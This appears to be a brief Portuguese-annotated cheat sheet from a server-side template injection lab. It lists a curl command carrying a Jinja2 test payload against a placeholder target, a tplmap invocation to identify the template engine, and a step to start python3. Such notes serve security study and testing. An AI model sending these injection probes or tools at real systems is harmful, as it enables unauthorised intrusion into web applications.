# SSTI Exploitation Example 3

| `curl -gs "http://<TARGET IP>:<PORT>/execute?cmd={{7*'7'}}"` | Interagindo com o alvo remoto (confirmando o back-end do Jinja2)               |
| ------------------------------------------------------------ | ------------------------------------------------------------------------------ |
| `./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'`     | Automatizando o processo de identificação do mecanismo de modelagem com tplmap |
| `python3`                                                    | Iniciando o interpretador python3                                              |
